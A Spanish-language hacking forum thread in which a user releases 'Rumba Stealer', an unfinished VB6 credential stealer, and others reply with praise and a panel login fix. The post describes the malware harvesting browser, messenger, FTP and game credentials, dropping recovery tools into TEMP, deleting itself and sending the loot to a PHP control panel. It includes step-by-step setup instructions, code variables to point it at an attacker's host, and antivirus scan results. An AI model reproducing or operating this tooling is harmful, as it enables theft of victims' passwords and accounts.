¡Buenas!

He decidido colgar por estos lares un stealer que empecé hace unos días pero que no lo terminé (tiene algunos errores).

El stealer lo único que hace es droppear los típicos programas de recovery de NirSoft y otros y envía los datos a una web (viene incluida).

Cosas del stealer:
- Droppea todo en la carpeta TEMP (fácil de cambiar).
- Autoelimina todos los archivos droppeados y a sí mismo.
- Obtiene información variada sobre el PC donde se ha ejecutado.
- Obtiene el antivirus, firewall y antispyware del PC (la función la encontré por google)
- Obtiene las credenciales de los navegadores más famosos (Firefox, Chrome, Opera, Safari y Sea Moneky).
- Obtiene las credenciales de los mensajeros instantáneos más famosos (son muchos, no los pondré aquí).
- Obtiene los seriales de muchos juegos.
- Obtiene las credenciales de los software de FTP más comunes (Filezilla, FTP Commander) aunque está bugueado, las credenciales se envian a la base de datos pero no se muestran en la página.

IMÁGENES DE LA WEB
Home
Imagen

Users
Imagen

(al clicar en un usuario se va a su página)
Página del usuario (información)
Imagen

Página del usuario (credenciales)
Imagen


TUTORIAL
Dentro del rar hay dos carpetas: Stealer y www + db.
Primero hay que modificar la web, para ello ir a la carpeta 'www + db'. Dentro de dicha carpeta está la carpeta 'includes' donde estarán varios archivos. Abrir el archivo 'config.php' y modificar lo siguiente:
$title = 'Rumba Stealer';
ése será el título de la página
$logo = 'rumba.png';
logo de la página (debe de estar dentro de la carpeta '/img'

Luego abrir el archivo 'connection.php' y modificar las variables con los datos del hosting donde se vaya a subir la web.

Dentro de la carpeta 'tools' están las 4 herramientas que se descargarán en el PC del remoto/usuario. Si no quieres que se descarguen del hosting web puedes subirlo a un servidor que permita hotlink (enlace que descarga directamente) como [Enlace externo eliminado para invitados].

También encontrarás el archivo 'db.sql' donde, obviamente, se encuentra la base de datos. Si subes la web pero no creas la base de datos no funcionará nada, está claro.
En la base de datos, en la tabla 'page_users' están los usuarios que podrán entrar en la página. También hay 2 tablas más 'page_visits' donde se muestran las visitas que se han hecho en la página y el referer (si tiene) y la tabla 'page_logins' donde se registran los logueos (usuario, IP y fecha).

Ahora toca configurar el stealer, para ello hay que ir a la carpeta 'Stealer' y abrir el archivo Rumba.vbp con tu VB6.
En el proyecto he puesto algunos comentarios pero por si acaso también lo pondré aquí.
El archivo principal es el módulo 'Start'. Ahí dentro hay 2 variables a cambiar.

Código: Seleccionar todo

host = "localhost"
    path = Environ("TEMP")
'host' se cambia por el host donde lo hayas subido (OJO: sin el 'http://' ni el '/').
'path' se cambia por la ruta donde se droppearán los archivos (OJO: la ruta no debe tener un '/' ni '\' al final).

Así ya debería bastar, pero si has subido las tools a otro servidor hay que cambiar las variables 'fileURL' de los módulos FTP, WBPV, MSPASS y GKR con las URL de las tools.

DISCLAIMER
- El template de la web la he encontrado por Internet ([Enlace externo eliminado para invitados]) pero todo lo demás lo he hecho yo.
- Eres libre de descargar, modificar y distribuir los archivos que subo a continuación sin mi permiso pero si los vas a subir a otro foro/web debes poner un enlace a la fuente (este tema).
- El stealer también lo he hecho completamente yo con algunas funciones/módulos encontrados por la red.
- Descárgalo bajo tu propia responsabilidad. En el archivo sólo hay 4 ejecutables (las tools) creadas por NirSoft, cakirbey y SecurityXploded.
- No me hago responsable del mal uso que le deis:good:

DESCARGA
[Enlace externo eliminado para invitados]

Testeado en Windows 7 64 bits

SCANS
chk4me

Mostrar/Ocultar

Majyx

Mostrar/Ocultar

Nodistribute

Mostrar/Ocultar

antopixel escribió:Que Maquina 72
Gracias, aunque no es nada del otro mundo. Hay stealers así por todos lados
eDuArDo__xD escribió:Me gusto el diseño del panel!

Muchas gracias por compartir 72asdf!

Saludos
¡Me alegra que te guste! La verdad es que probé muchos templates antes de escoger este.
Lo monté, pero es error mio o el login no funciona? ya que por ejemplo entras a la url y te redirige al login pero si se entra directamente por ejemplo [Enlace externo eliminado para invitados] te muestra los datos. Podrias revisar o solo es mi imaginación.
adwind escribió:Lo monté, pero es error mio o el login no funciona? ya que por ejemplo entras a la url y te redirige al login pero si se entra directamente por ejemplo [Enlace externo eliminado para invitados] te muestra los datos. Podrias revisar o solo es mi imaginación.
Cierto, lo que pasa es que la web que he subido la utilizaba para mis cosas (juegos, notas, calendarios, etc) y la monté para que sólo fuera para el stealer para subirla y el archivo home.php no lo configuré para que redireccionara.
Para arreglarlo hay que añadir la línea

Código: Seleccionar todo

include('utils/visit.php');
debajo de

Código: Seleccionar todo

include(__DIR__.'/include/jrumba.php');
Gracias por avisar, qué pena que no pueda editar el post principal.
Blader escribió:Exelente amigo , gran trabajo
¡Gracias!

Si alguien ve que se puede mejorar u optimizar el código que me lo diga.
Felicidades por tan buen post, y herramienta, a mi también me gustó el diseño. Y te iba a preguntar donde lo descargaste porque yo PHP lo que quieras pero diseño poca imaginación jejeje.

Si tienes que editar el enlace o algo del post solo pidemelo por mp a mi o algún mod y enseguida estará editado.

Saludos!
Soy un camaleón, en tu cama, leona ♪
$DoC escribió:Felicidades por tan buen post, y herramienta, a mi también me gustó el diseño. Y te iba a preguntar donde lo descargaste porque yo PHP lo que quieras pero diseño poca imaginación jejeje.

Si tienes que editar el enlace o algo del post solo pidemelo por mp a mi o algún mod y enseguida estará editado.

Saludos!
Muchas gracias
El template de la página lo descargué aquí [Enlace externo eliminado para invitados]
En esa página aparece un enlace para ver una live demo y 2 enlaces de descarga.

Ahora te enviaré un MP con el nuevo enlace de descarga ya que también he modificado un poco la home para ver una tabla con las visitas.
[Enlace externo eliminado para invitados] hay tiene miles de paneles de admin, luego ponen el nombre en google y free download y lo tienen gratis.

Blau, moltes gràcies!
Responder

Volver a “Troyanos y Herramientas”